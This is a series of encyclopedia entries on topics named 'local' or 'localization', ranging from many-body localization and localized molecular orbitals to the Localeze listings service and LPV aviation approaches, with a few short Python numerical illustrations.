Local structure is a term in nuclear spectroscopy that refers to the structure of the nearest neighbours around an atom in crystals and molecules . In crystals, for example, the atoms order in a regular fashion over long ranges, sometimes forming gigantic, highly ordered crystals ( Naica Mine ). In reality, however, crystals are never perfect: they have impurities or defects, meaning that a foreign atom resides on a lattice site or between lattice sites (interstitials). These small defects and impurities cannot be seen by methods such as X-ray diffraction or neutron diffraction , because these methods by their nature average over a large number of atoms and are thus insensitive to effects in the local structure. Methods in nuclear spectroscopy use specific nuclei as probes. The nucleus of an atom is about 10,000 to 150,000 times smaller than the atom itself. It experiences the electric fields created by the atom's electrons that surround the nucleus. In addition, the electric fields created by neighbouring atoms also influence the fields that the nucleus experiences. The interactions between the nucleus and these fields are called hyperfine interactions ; they influence the nucleus' properties. The nucleus is therefore very sensitive to small changes in its hyperfine structure, which can be measured by methods of nuclear spectroscopy such as nuclear magnetic resonance , Mössbauer spectroscopy , and perturbed angular correlation .
With the same methods, the local magnetic fields in a crystal structure can also be probed, providing a magnetic local structure. This is of great importance for understanding defects in magnetic materials, which have a wide range of applications, such as modern magnetic materials or the giant magnetoresistance effect used in the read heads of hard drives.
Research of the local structure of materials has become an important tool for the understanding of properties especially in functional materials, such as used in electronics, chips, batteries, semiconductors, or solar cells. Many of those materials are defect materials and their specific properties are controlled by defects.
| https://en.wikipedia.org/wiki/Local_structure |
In mathematics , the local trace formula ( Arthur 1991 ) is a local analogue of the Arthur–Selberg trace formula that describes the character of the representation of $G(F)$ on the discrete part of $L^2(G(F))$, for $G$ a reductive algebraic group over a local field $F$.
| https://en.wikipedia.org/wiki/Local_trace_formula |
Localeze is a content manager for local search engines. The company, a service of Neustar , provides businesses with tools to verify and manage the identity of their local listings across the Web. The company works with local search platform partners and location-based [ 1 ] service partners, national brands and local business clients. [ 2 ] [ 3 ] [ 4 ]
Localeze was created in 2005 to help businesses ensure that they have accurate name, address and phone number data available on search engines , Internet Yellow Pages and vertical directories.
In 2010, business listings were also included in personal navigation devices , [ 5 ] mobile apps and on social networking services . [ 6 ]
As a local search business listings provider, Localeze collects and distributes business listings that can be verified by businesses themselves. Its business listings are used by search, social and mobile companies [ 7 ] in the domain of Local Search and location-based services . Such partners include Yahoo! , [ 8 ] Bing , Yellow Pages , TomTom , Siri (acquired by Apple ), Twitter , and Facebook . [ 9 ] | https://en.wikipedia.org/wiki/Localeze |
Many-body localization (MBL) is a dynamical phenomenon which leads to the breakdown of equilibrium statistical mechanics in isolated many-body systems. Such systems never reach local thermal equilibrium , and retain local memory of their initial conditions for infinite times. One can still define a notion of phase structure in these out-of-equilibrium systems. Strikingly, MBL can even enable new kinds of exotic orders that are disallowed in thermal equilibrium – a phenomenon that goes by the name of localization-protected quantum order (LPQO) or eigenstate order. [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ]
The study of phases of matter and the transitions between them has been a central enterprise in physics for well over a century. One of the earliest paradigms for elucidating phase structure, associated most with Landau, classifies phases according to the spontaneous breaking of global symmetries present in a physical system. More recently, we have also made great strides in understanding topological phases of matter which lie outside Landau's framework: the order in topological phases cannot be characterized by local patterns of symmetry breaking, and is instead encoded in global patterns of quantum entanglement .
All of this remarkable progress rests on the foundation of equilibrium statistical mechanics. Phases and phase transitions are only sharply defined for macroscopic systems in the thermodynamic limit, and statistical mechanics allows us to make useful predictions about such macroscopic systems with many (~$10^{23}$) constituent particles. A fundamental assumption of statistical mechanics is that systems generically reach a state of thermal equilibrium (such as the Gibbs state) which can be characterized by only a few parameters, such as temperature or a chemical potential. Traditionally, phase structure is studied by examining the behavior of "order parameters" in equilibrium states. At zero temperature, these are evaluated in the ground state of the system, and different phases correspond to different quantum orders (topological or otherwise). Thermal equilibrium strongly constrains the allowed orders at finite temperatures. In general, thermal fluctuations at finite temperatures reduce the long-ranged quantum correlations present in ordered phases and, in lower dimensions, can destroy order altogether. As an example, the Peierls-Mermin-Wagner theorems prove that a one-dimensional system cannot spontaneously break a continuous symmetry at any non-zero temperature.
Recent progress on the phenomenon of many-body localization has revealed classes of generic (typically disordered) many-body systems which never reach local thermal equilibrium, and thus lie outside the framework of equilibrium statistical mechanics. [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 1 ] MBL systems can undergo a dynamical phase transition to a thermalizing phase as parameters such as the disorder or interaction strength are tuned, and the nature of the MBL-to-thermal phase transition is an active area of research. The existence of MBL raises the interesting question of whether one can have different kinds of MBL phases, just as there are different kinds of thermalizing phases. Remarkably, the answer is affirmative, and out-of-equilibrium systems can also display a rich phase structure. What's more, the suppression of thermal fluctuations in localized systems can even allow for new kinds of order that are forbidden in equilibrium—which is the essence of localization-protected quantum order. [ 1 ] The recent discovery of time-crystals in periodically driven MBL systems is a notable example of this phenomenon. [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ]
Studying phase structure in localized systems requires us to first formulate a sharp notion of a phase away from thermal equilibrium. This is done via the notion of eigenstate order : [ 1 ] one can measure order parameters and correlation functions in individual energy eigenstates of a many-body system, instead of averaging over several eigenstates as in a Gibbs state. The key point is that individual eigenstates can show patterns of order that may be invisible to thermodynamic averages over eigenstates. Indeed, a thermodynamic ensemble average is not even appropriate in MBL systems, since they never reach thermal equilibrium. What's more, while individual eigenstates are not themselves experimentally accessible, order in eigenstates nevertheless has measurable dynamical signatures. The eigenspectrum properties change in a singular fashion as the system transitions from one type of MBL phase to another, or from an MBL phase to a thermal one, again with measurable dynamical signatures.
When considering eigenstate order in MBL systems, one generally speaks of highly excited eigenstates at energy densities that would correspond to high or infinite temperatures if the system were able to thermalize. In a thermalizing system, the temperature is defined via $T = \left(\frac{dS}{dE}\right)^{-1}$, where the entropy $S$ is maximized near the middle of the many-body spectrum (corresponding to $T = \infty$) and vanishes near the edges of the spectrum (corresponding to $T = 0^{\pm}$). Thus, "infinite temperature eigenstates" are those drawn from near the middle of the spectrum, and it is more correct to refer to energy densities rather than temperatures, since temperature is only defined in equilibrium. In MBL systems, the suppression of thermal fluctuations means that the properties of highly excited eigenstates are similar, in many respects, to those of ground states of gapped local Hamiltonians. This enables various forms of ground-state order to be promoted to finite energy densities.
We note that in thermalizing many-body systems, the notion of eigenstate order is congruent with the usual definition of phases. This is because the eigenstate thermalization hypothesis (ETH) implies that local observables (such as order parameters) computed in individual eigenstates agree with those computed in the Gibbs state at a temperature appropriate to the energy density of the eigenstate. On the other hand, MBL systems do not obey the ETH, and nearby many-body eigenstates have very different local properties. This is what enables individual MBL eigenstates to display order even if thermodynamic averages are forbidden from doing so.
Localization enables symmetry breaking orders at finite energy densities, forbidden in equilibrium by the Peierls-Mermin-Wagner Theorems.
Let us illustrate this with the concrete example of a disordered transverse field Ising chain in one dimension: [ 17 ] [ 1 ] [ 2 ]
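The nearest-neighbor bond and transverse-field terms of the Hamiltonian are fixed by the couplings defined below, while the precise form of the $J_{\rm int}$ interaction term varies between references, so a next-nearest-neighbor coupling is assumed here:

$$H \;=\; \sum_{i} J_i\,\sigma_i^z \sigma_{i+1}^z \;+\; J_{\rm int}\sum_{i} \sigma_i^z \sigma_{i+2}^z \;+\; \sum_{i} h_i\,\sigma_i^x$$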
where $\sigma_i^{x/y/z}$ are Pauli spin-1/2 operators in a chain of length $L$, all the couplings $\{J_i, h_i\}$ are positive random numbers drawn from distributions with means $\overline{J}, \overline{h}$, and the system has Ising symmetry $P = \prod_i \sigma_i^x$ corresponding to flipping all spins in the $z$ basis. The $J_{\rm int}$ term introduces interactions, and the system is mappable to a free-fermion model (the Kitaev chain ) when $J_{\rm int} = 0$.
Let us first consider the clean, non-interacting system: $J_i = J$, $h_i = h$, $J_{\rm int} = 0$. In equilibrium, the ground state is ferromagnetically ordered with spins aligned along the $z$ axis for $J > h$, but is a paramagnet for $J < h$ and at any finite temperature (Fig 1a). Deep in the ordered phase, the system has two degenerate Ising-symmetric ground states which look like "Schrödinger cat" or superposition states: $|\psi_0^{\pm}\rangle = \frac{1}{\sqrt{2}}\left(|\uparrow\uparrow\cdots\uparrow\rangle \pm |\downarrow\downarrow\cdots\downarrow\rangle\right)$. These display long-range order:
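that is, the spin-spin correlator between these ground states remains finite at arbitrary separation (the standard statement of long-range order):

$$\lim_{|i-j|\to\infty} \langle \psi_0^{\pm}|\,\sigma_i^z \sigma_j^z\,|\psi_0^{\pm}\rangle \;\neq\; 0$$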
At any finite temperature, thermal fluctuations lead to a finite density of delocalized domain walls since the entropic gain from creating these domain walls wins over the energy cost in one dimension. These fluctuations destroy long-range order since the presence of fluctuating domain walls destroys the correlation between distant spins.
Upon turning on disorder, the excitations in the non-interacting model ($J_{\rm int} = 0$) localize due to Anderson localization . In other words, the domain walls get pinned by the disorder, so that a generic highly excited eigenstate for $\overline{J} \gg \overline{h}$ looks like $|\psi_{\rm SG}^{n,\pm}\rangle = \frac{1}{\sqrt{2}}\left(|\uparrow\uparrow\downarrow\downarrow\downarrow\uparrow\uparrow\cdots\rangle \pm |\downarrow\downarrow\uparrow\uparrow\uparrow\downarrow\downarrow\cdots\rangle\right)$, where $n$ refers to the $n^{\text{th}}$ eigenstate and the pattern is eigenstate dependent. [ 1 ] [ 2 ] Note that a spin-spin correlation function evaluated in this state is non-zero for arbitrarily distant spins, but has fluctuating sign depending on whether an even/odd number of domain walls is crossed between two sites. Whence, we say that the system has long-range spin- glass (SG) order. Indeed, for $\overline{J} > \overline{h}$, localization promotes the ground-state ferromagnetic order to spin-glass order in highly excited states at all energy densities (Fig 1b). If one averages over eigenstates as in the thermal Gibbs state, the fluctuating signs cause the correlation to average out, as required by the Peierls theorem forbidding the breaking of discrete symmetries at finite temperatures in 1D. For $\overline{J} < \overline{h}$, the system is paramagnetic (PM), and the eigenstates deep in the PM look like product states in the $x$ basis and do not show long-range Ising order: $|\psi_{\rm PM}^{n}\rangle = |\rightarrow\rightarrow\leftarrow\leftarrow\leftarrow\rightarrow\cdots\rangle$. The transition between the localized PM and the localized SG at $\overline{J} = \overline{h}$ belongs to the infinite-randomness universality class. [ 17 ]
Upon turning on weak interactions $J_{\rm int} \neq 0$, the Anderson insulator remains many-body localized and order persists deep in the PM/SG phases. Strong enough interactions destroy MBL, and the system transitions to a thermalizing phase. The fate of the MBL PM to MBL SG transition in the presence of interactions is presently unsettled, and it is likely that this transition proceeds via an intervening thermal phase (Fig 1c).
While the discussion above pertains to sharp diagnostics of LPQO obtained by evaluating order parameters and correlation functions in individual highly excited many-body eigenstates, such quantities are nearly impossible to measure experimentally. Nevertheless, even though individual eigenstates aren't themselves experimentally accessible, order in eigenstates has measurable dynamical signatures. In other words, measuring a local physically accessible observable in time starting from a physically preparable initial state still contains sharp signatures of eigenstate order.
For example, for the disordered Ising chain discussed above, one can prepare random symmetry-broken initial states which are product states in the $z$ basis: $|\psi_0\rangle = |\uparrow\downarrow\downarrow\uparrow\cdots\uparrow\uparrow\downarrow\rangle$. These randomly chosen states are at infinite temperature. Then, one can measure the local magnetization $\langle\sigma_i^z\rangle$ in time, which acts as an order parameter for symmetry breaking. It is straightforward to show that $\langle\psi_0(t)|\sigma_i^z|\psi_0(t)\rangle$ saturates to a non-zero value even at infinitely late times in the symmetry-broken spin-glass phase, while it decays to zero in the paramagnet. The singularity in the eigenspectrum properties at the transition between the localized SG and PM phases translates into a sharp, measurable dynamical phase transition. Indeed, a nice example of this is furnished by recent experiments [ 15 ] [ 16 ] detecting time crystals in Floquet MBL systems, where the time-crystal phase spontaneously breaks both time-translation symmetry and spatial Ising symmetry, showing correlated spatiotemporal eigenstate order.
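As a concrete illustration of this dynamical diagnostic, here is a self-contained exact-diagonalization sketch in Python of the disordered chain described above. The system size, coupling ranges, and the next-nearest-neighbor form of the $J_{\rm int}$ term are illustrative assumptions, not parameters taken from the cited works:

```python
import numpy as np

# Illustrative parameters, chosen deep on the spin-glass side:
rng = np.random.default_rng(0)
L = 8                              # chain length (2**L = 256 states)
J = rng.uniform(2.0, 3.0, L - 1)   # strong random bonds
h = rng.uniform(0.0, 0.5, L)       # weak random transverse fields
J_int = 0.1                        # assumed next-nearest-neighbor interaction

sx = np.array([[0.0, 1.0], [1.0, 0.0]])
sz = np.array([[1.0, 0.0], [0.0, -1.0]])

def site_op(op, i):
    """Embed a single-site operator at site i of the L-site chain."""
    mats = [np.eye(2)] * L
    mats[i] = op
    out = mats[0]
    for m in mats[1:]:
        out = np.kron(out, m)
    return out

H = sum(J[i] * site_op(sz, i) @ site_op(sz, i + 1) for i in range(L - 1))
H += sum(J_int * site_op(sz, i) @ site_op(sz, i + 2) for i in range(L - 2))
H += sum(h[i] * site_op(sx, i) for i in range(L))

# Random z-basis product state: an "infinite temperature" initial condition.
bits = rng.integers(0, 2, L)
idx = int("".join(map(str, bits)), 2)
psi0 = np.zeros(2 ** L)
psi0[idx] = 1.0

# Evolve and watch <sigma^z_0>(t): deep in the MBL spin-glass phase it
# should stay near its initial value of +/-1 instead of decaying to zero.
E, V = np.linalg.eigh(H)
sz0 = site_op(sz, 0)
c = V.T @ psi0
for t in [0.0, 1.0, 10.0, 100.0]:
    psi_t = V @ (np.exp(-1j * E * t) * c)
    print(t, np.real(psi_t.conj() @ sz0 @ psi_t))
```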
Similar to the case of symmetry-breaking order, thermal fluctuations at finite temperatures can reduce or destroy the quantum correlations necessary for topological order. Once again, localization can enable such orders in regimes forbidden in equilibrium. This happens both for the so-called long-range entangled topological phases and for symmetry-protected or short-range entangled topological phases. The toric code / $Z_2$ gauge theory in 2D is an example of the former, and the topological order in this phase can be diagnosed by Wilson loop operators. The topological order is destroyed in equilibrium at any finite temperature due to fluctuating vortices; however, these can get localized by disorder, enabling glassy localization-protected topological order at finite energy densities. [ 12 ] On the other hand, symmetry-protected topological (SPT) phases do not have any bulk long-range order, and are distinguished from trivial paramagnets by the presence of coherent gapless edge modes as long as the protecting symmetry is present. In equilibrium, these edge modes are typically destroyed at finite temperatures as they decohere due to interactions with delocalized bulk excitations. Once again, localization protects the coherence of these modes even at finite energy densities. [ 18 ] [ 19 ] The presence of localization-protected topological order could potentially have far-reaching consequences for developing new quantum technologies by allowing for quantum-coherent phenomena at high energies.
It has been shown that periodically driven or Floquet systems can also be many-body localized under suitable drive conditions. [ 20 ] [ 21 ] This is remarkable because one generically expects a driven many-body system to simply heat up to a trivial infinite temperature state (the maximum entropy state without energy conservation). However, with MBL, this heating can be evaded and one can again get non-trivial quantum orders in the eigenstates of the Floquet unitary, which is the time-evolution operator for one period. The most striking example of this is the time-crystal, a phase with long-range spatiotemporal order and spontaneous breaking of time translation symmetry. [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] This phase is disallowed in thermal equilibrium, but can be realized in a Floquet MBL setting. | https://en.wikipedia.org/wiki/Localization-protected_quantum_order |
In mathematics , particularly in integral calculus , the localization theorem allows one, under certain conditions, to infer the nullity of a function given only information about its continuity and the value of its integral.
Let F ( x ) be a real-valued function defined on some open interval Ω of the real line that is continuous in Ω. Let D be an arbitrary subinterval contained in Ω. The theorem states the following implication: ∫ D F ( x ) d x = 0 ∀ D ⊂ Ω ⇒ F ( x ) = 0 ∀ x ∈ Ω {\displaystyle \int _{D}F(x)\,\mathrm {d} x=0~\forall D\subset \Omega ~\Rightarrow ~F(x)=0~\forall x\in \Omega }
A simple proof is as follows: if there were a point x 0 within Ω for which F ( x 0 ) ≠ 0 , then the continuity of F would require the existence of a neighborhood of x 0 in which the value of F was nonzero, and in particular of the same sign as at x 0 . Since such a neighborhood N , which can be taken to be arbitrarily small, must nevertheless have nonzero width on the real line, the integral of F over N would evaluate to a nonzero value. However, since x 0 is part of the open set Ω, all neighborhoods of x 0 smaller than the distance of x 0 to the boundary of Ω are included within it, and so the integral of F over them must evaluate to zero. Having reached the contradiction that ∫ N F ( x ) dx must be both zero and nonzero, the initial hypothesis must be wrong, and thus there is no x 0 in Ω for which F ( x 0 ) ≠ 0 .
The theorem is easily generalized to multivariate functions , replacing intervals with the more general concept of connected open sets , that is, domains , and the original function with some F ( x ) : R n → R , with the constraints of continuity and nullity of its integral over any subdomain D ⊂ Ω . The proof is completely analogous to the single variable case, and concludes with the impossibility of finding a point x 0 ∈ Ω such that F ( x 0 ) ≠ 0 .
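Before turning to the physical application below, here is a small numerical illustration (the function and interval endpoints are made-up examples, not part of the theorem) emphasizing that the hypothesis must hold for every subinterval; a single vanishing integral is not enough.

```python
from scipy.integrate import quad

# F(x) = x on Omega = (-1, 1): the integral vanishes on symmetric
# subintervals but not on all subintervals, so the theorem's hypothesis
# fails and F need not be (and is not) identically zero.
F = lambda x: x

print(quad(F, -0.5, 0.5)[0])  # ~0.0 on a symmetric subinterval
print(quad(F, 0.1, 0.7)[0])   # 0.24 != 0: "for all D" is violated for F
```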
An example of the use of this theorem in physics is the law of conservation of mass for fluids, which states that the mass of any fluid volume must not change: d d t ∫ V f ρ ( x → , t ) d Ω = 0 {\displaystyle {\frac {\mathrm {d} }{\mathrm {d} t}}\int _{V_{f}}\rho ({\vec {x}},t)\,\mathrm {d} \Omega =0}
Applying the Reynolds transport theorem , one can change the reference to an arbitrary (non-fluid) control volume V c . Further assuming that the density function is continuous (i.e. that our fluid is monophasic and thermodynamically metastable) and that V c is not moving relative to the chosen system of reference, the equation becomes: ∫ V c [ ∂ ρ ∂ t + ∇ ⋅ ( ρ v → ) ] d Ω = 0 {\displaystyle \int _{V_{c}}\left[{{\partial \rho } \over {\partial t}}+\nabla \cdot (\rho {\vec {v}})\right]\,\mathrm {d} \Omega =0}
As the equation holds for any such control volume, the localization theorem applies, rendering the common partial differential equation for the conservation of mass in monophase fluids: ∂ ρ ∂ t + ∇ ⋅ ( ρ v → ) = 0 {\displaystyle {\partial \rho \over \partial t}+\nabla \cdot (\rho {\vec {v}})=0} | https://en.wikipedia.org/wiki/Localization_theorem |
Localized molecular orbitals are molecular orbitals which are concentrated in a limited spatial region of a molecule, such as a specific bond or lone pair on a specific atom. They can be used to relate molecular orbital calculations to simple bonding theories, and also to speed up post-Hartree–Fock electronic structure calculations by taking advantage of the local nature of electron correlation . Localized orbitals in systems with periodic boundary conditions are known as Wannier functions .
Standard ab initio quantum chemistry methods lead to delocalized orbitals that, in general, extend over an entire molecule and have the symmetry of the molecule. Localized orbitals may then be found as linear combinations of the delocalized orbitals, given by an appropriate unitary transformation .
In the water molecule, for example, ab initio calculations show bonding character primarily in two molecular orbitals, each with electron density equally distributed between the two O-H bonds. The localized orbital corresponding to one O-H bond is the sum of these two delocalized orbitals, and the localized orbital for the other O-H bond is their difference, in accordance with valence bond theory .
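A toy numerical sketch of this sum/difference construction, with the two delocalized orbitals represented in a hypothetical two-dimensional "bond basis" (the vectors and basis are illustrative assumptions, not the output of an actual ab initio calculation):

```python
import numpy as np

# Two delocalized bonding orbitals, each spread equally over both O-H bonds,
# written in a hypothetical basis whose two axes stand for the two bonds.
phi_plus = np.array([1.0, 1.0]) / np.sqrt(2)    # symmetric combination
phi_minus = np.array([1.0, -1.0]) / np.sqrt(2)  # antisymmetric combination

# Localization is a unitary transformation: a 45-degree rotation of the pair
# yields one orbital per O-H bond (their normalized sum and difference).
U = np.array([[1.0, 1.0], [1.0, -1.0]]) / np.sqrt(2)
localized = U @ np.vstack([phi_plus, phi_minus])

print(localized)  # rows ~ [1, 0] and [0, 1]: one orbital per O-H bond
```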
For multiple bonds and lone pairs, different localization procedures give different orbitals . The Boys and Edmiston-Ruedenberg localization methods mix these orbitals to give equivalent bent bonds in ethylene and rabbit ear lone pairs in water, while the Pipek-Mezey method preserves their respective σ and π symmetry .
For molecules with a closed electron shell, in which each molecular orbital is doubly occupied, the localized and delocalized orbital descriptions are in fact equivalent and represent the same physical state. It might seem, again using the example of water, that placing two electrons in the first bond and two other electrons in the second bond is not the same as having four electrons free to move over both bonds. However, in quantum mechanics all electrons are identical and cannot be distinguished as same or other . The total wavefunction must have a form which satisfies the Pauli exclusion principle (changing sign when two electrons are exchanged), such as a Slater determinant (or linear combination of Slater determinants), and it can be shown [ 1 ] that such a function is unchanged by any unitary transformation of the doubly occupied orbitals.
For molecules with an open electron shell, in which some molecular orbitals are singly occupied, the electrons of alpha and beta spin must be localized separately. [ 2 ] [ 3 ] This applies to radical species such as nitric oxide and dioxygen. Again, in this case the localized and delocalized orbital descriptions are equivalent and represent the same physical state.
Localized molecular orbitals (LMO) [ 4 ] are obtained by unitary transformation upon a set of canonical molecular orbitals (CMO). The transformation usually involves the optimization (either minimization or maximization) of the expectation value of a specific operator. The generic form of the localization potential is:
⟨ L ^ ⟩ = ∑ i = 1 n ⟨ ϕ i ϕ i | L ^ | ϕ i ϕ i ⟩ {\displaystyle \langle {\hat {L}}\rangle =\sum _{i=1}^{n}\langle \phi _{i}\phi _{i}|{\hat {L}}|\phi _{i}\phi _{i}\rangle } ,
where L ^ {\displaystyle {\hat {L}}} is the localization operator and ϕ i {\displaystyle \phi _{i}} is a molecular spatial orbital. Many methodologies have been developed during the past decades, differing in the form of L ^ {\displaystyle {\hat {L}}} .
The optimization of the objective function is usually performed using pairwise Jacobi rotations. [ 5 ] However, this approach is prone to saddle point convergence (if it even converges), and thus other approaches have also been developed, from simple conjugate gradient methods with exact line searches, [ 6 ] to Newton-Raphson [ 7 ] and trust-region methods. [ 8 ]
The Foster-Boys (also known as Boys ) localization method [ 9 ] minimizes the spatial extent of the orbitals by minimizing ⟨ L ^ ⟩ {\displaystyle \langle {\hat {L}}\rangle } , where L ^ = | r → 1 − r → 2 | 2 {\displaystyle {\hat {L}}=|{\vec {r}}_{1}-{\vec {r}}_{2}|^{2}} . This turns out to be equivalent [ 10 ] [ 11 ] to the easier task of maximizing ∑ i n [ ⟨ ϕ i | r → | ϕ i ⟩ ] 2 {\displaystyle \sum _{i}^{n}[\langle \phi _{i}|{\vec {r}}|\phi _{i}\rangle ]^{2}} . In one dimension, the Foster-Boys (FB) objective function can also be written as
⟨ L ^ FB ⟩ = ∑ i ⟨ ϕ i | ( x ^ − ⟨ i | x ^ | i ⟩ ) 2 | ϕ i ⟩ {\displaystyle \langle {\hat {L}}_{\text{FB}}\rangle =\sum _{i}\langle \phi _{i}|({\hat {x}}-\langle i|{\hat {x}}|i\rangle )^{2}|\phi _{i}\rangle } . [ 12 ]
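The following sketch shows how such an objective is optimized by a single pairwise Jacobi rotation (cf. the optimization discussion above) for two orbitals in one dimension; the 2×2 dipole matrix X is a made-up example, not data from a real calculation.

```python
import numpy as np

# Maximize sum_i <phi_i| x |phi_i>^2 over a Jacobi rotation of one orbital
# pair, which is equivalent to minimizing the Foster-Boys objective above.
X = np.array([[0.0, 1.3],
              [1.3, 2.0]])  # hypothetical dipole matrix <phi_i| x |phi_j>

def objective(theta):
    c, s = np.cos(theta), np.sin(theta)
    U = np.array([[c, s], [-s, c]])
    Xr = U @ X @ U.T        # dipole matrix in the rotated orbital basis
    return Xr[0, 0] ** 2 + Xr[1, 1] ** 2

thetas = np.linspace(0.0, np.pi, 2001)
best = max(thetas, key=objective)
print(objective(0.0), best, objective(best))  # the rotation raises the objective
```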
The fourth moment (FM) procedure [ 12 ] is analogous to the Foster-Boys scheme, but the orbital fourth moment is used instead of the orbital second moment. The objective function to be minimized is
⟨ L ^ FM ⟩ = ∑ i ⟨ ϕ i | ( x ^ − ⟨ ϕ i | x ^ | ϕ i ⟩ ) 4 | ϕ i ⟩ {\displaystyle \langle {\hat {L}}_{\text{FM}}\rangle =\sum _{i}\langle \phi _{i}|({\hat {x}}-\langle \phi _{i}|{\hat {x}}|\phi _{i}\rangle )^{4}|\phi _{i}\rangle } .
The fourth moment method produces more localized virtual orbitals than the Foster-Boys method, [ 12 ] since it implies a larger penalty on the delocalized tails. For graphene (a delocalized system), the fourth moment method produces more localized occupied orbitals than the Foster-Boys and Pipek-Mezey schemes. [ 12 ]
Edmiston-Ruedenberg localization [ 5 ] maximizes the electronic self-repulsion energy by maximizing ⟨ L ^ ER ⟩ {\displaystyle \langle {\hat {L}}_{\text{ER}}\rangle } , where L ^ = | r → 1 − r → 2 | − 1 {\displaystyle {\hat {L}}=|{\vec {r}}_{1}-{\vec {r}}_{2}|^{-1}} .
Pipek-Mezey localization [ 13 ] takes a slightly different approach, maximizing the sum of orbital-dependent partial charges on the nuclei:
⟨ L ^ ⟩ PM = ∑ A atoms ∑ i orbitals | q i A | 2 {\displaystyle \langle {\hat {L}}\rangle _{\textrm {PM}}=\sum _{A}^{\textrm {atoms}}\sum _{i}^{\textrm {orbitals}}|q_{i}^{A}|^{2}} .
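A minimal sketch of evaluating this objective with Mulliken charges (the charge schemes are discussed further below); the coefficient matrix, unit overlap matrix, and two-atom partition are all hypothetical placeholders.

```python
import numpy as np

rng = np.random.default_rng(3)

def mulliken_charge(C, S, mus, i):
    """Mulliken population of orbital i on the atom owning basis functions mus:
    q_i^A = sum_{mu in A} sum_nu C[mu, i] * S[mu, nu] * C[nu, i]."""
    return sum(C[mu, i] * S[mu, nu] * C[nu, i]
               for mu in mus for nu in range(S.shape[0]))

def pm_objective(C, S, atoms):
    return sum(mulliken_charge(C, S, mus, i) ** 2
               for mus in atoms.values() for i in range(C.shape[1]))

# Hypothetical system: 2 occupied orbitals in 4 orthonormal basis functions,
# the first two centered on atom "A", the last two on atom "B".
C, _ = np.linalg.qr(rng.normal(size=(4, 2)))  # orthonormal MO coefficients
S = np.eye(4)                                 # overlap matrix
atoms = {"A": [0, 1], "B": [2, 3]}

print(pm_objective(C, S, atoms))  # the quantity a PM localizer maximizes
```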
Pipek and Mezey originally used Mulliken charges , which are mathematically ill-defined . Recently, Pipek-Mezey style schemes based on a variety of mathematically well-defined partial charge estimates have been discussed. [ 14 ] Some notable choices are Voronoi charges, [ 14 ] Becke charges, [ 14 ] Hirshfeld or Stockholder charges, [ 14 ] intrinsic atomic orbital charges (see intrinsic bond orbitals ), [ 15 ] Bader charges, [ 16 ] or "fuzzy atom" charges. [ 17 ] Rather surprisingly, despite the wide variation in the (total) partial charges reproduced by the different estimates, analysis of the resulting Pipek-Mezey orbitals has shown that the localized orbitals are rather insensitive to the partial charge estimation scheme used in the localization process. [ 14 ] However, because Mulliken charges (and the Löwdin charges that have also been used in some works [ 18 ] ) are mathematically ill-defined, it is advisable to use one of the well-defined alternatives now available in place of the original version.
The most important quality of the Pipek-Mezey scheme is that it preserves σ-π separation in planar systems, which sets it apart from the Foster-Boys and Edmiston-Ruedenberg schemes that mix σ and π bonds. This property holds independent of the partial charge estimate used. [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ]
While the usual formulation of the Pipek-Mezey method invokes an iterative procedure to localize the orbitals, a non-iterative method has also been recently suggested. [ 19 ]
Organic chemistry is often discussed in terms of localized molecular orbitals in a qualitative and informal sense. Historically, much of classical organic chemistry was built on the older valence bond / orbital hybridization models of bonding. To account for phenomena like aromaticity , this simple model of bonding is supplemented by semi-quantitative results from Hückel molecular orbital theory . However, the understanding of stereoelectronic effects requires the analysis of interactions between donor and acceptor orbitals between two molecules or different regions within the same molecule, and molecular orbitals must be considered. Because proper (symmetry-adapted) molecular orbitals are fully delocalized and do not admit a ready correspondence with the "bonds" of the molecule, as visualized by the practicing chemist, the most common approach is to instead consider the interaction between filled and unfilled localized molecular orbitals that correspond to σ bonds, π bonds, lone pairs, and their unoccupied counterparts. These orbitals are typically given the notation σ (sigma bonding), π (pi bonding), n (occupied nonbonding orbital, "lone pair"), p (unoccupied nonbonding orbital, "empty p orbital"; the symbol n * for unoccupied nonbonding orbital is seldom used), π* (pi antibonding), and σ* (sigma antibonding). (Woodward and Hoffmann use ω for nonbonding orbitals in general, occupied or unoccupied.) When comparing localized molecular orbitals derived from the same atomic orbitals, these classes generally follow the order σ < π < n < p ( n *) < π* < σ* when ranked by increasing energy. [ 20 ]
The localized molecular orbitals that organic chemists often depict can be thought of as qualitative renderings of orbitals generated by the computational methods described above. However, they do not map onto any single approach, nor are they used consistently. For instance, the lone pairs of water are usually treated as two equivalent sp x {\displaystyle \mathrm {sp} ^{x}} hybrid orbitals, while the corresponding "nonbonding" orbitals of carbenes are generally treated as a filled σ(out) orbital and an unfilled pure p orbital, even though the lone pairs of water could be described analogously by filled σ(out) and p orbitals ( for further discussion, see the article on lone pair and the discussion above on sigma-pi and equivalent-orbital models ). In other words, the type of localized orbital invoked depends on context and considerations of convenience and utility.
Localizer performance with vertical guidance ( LPV ) refers to the highest-precision GPS ( SBAS -enabled) aviation instrument approach procedures currently available without specialized aircrew training requirements, such as required navigation performance (RNP). Landing minima are usually similar to those of a Cat I instrument landing system (ILS), that is, a decision height of 200 feet (61 m) and visibility of 800 m. [ 1 ] Lateral guidance is equivalent to that of a localizer , while vertical guidance is provided by a ground-independent electronic glide path. Thus, the decision altitude , DA, can be as low as 200 feet. An LPV approach is an approach with vertical guidance, APV, to distinguish it from a precision approach, PA, or a non-precision approach, NPA. SBAS criteria include a vertical alarm limit of more than 12 m but less than 50 m, yet an LPV approach does not meet the ICAO Annex 10 precision approach standard. [ 2 ]
Examples of receivers providing LPV capability include (from Garmin ) the GTN 7xx & 6xx, GNS 480, GNS 430W & 530W, and the post 2007 Garmin G1000 with GIA 63W. Various FMS models, GNSS receivers and FMS upgrades are available from Rockwell Collins (e.g. [ 3 ] ). Most new aircraft and helicopters equipped with integrated flight decks such as Rockwell Collins ProLine (TM) 21 and ProLine Fusion (TM) are LPV-capable. [ 4 ] In 2014, Avidyne began equipping general aviation and business aircraft with the IFD540 and IFD440 navigators incorporating a touch-screen flight management system with full LPV capability. [ 5 ]
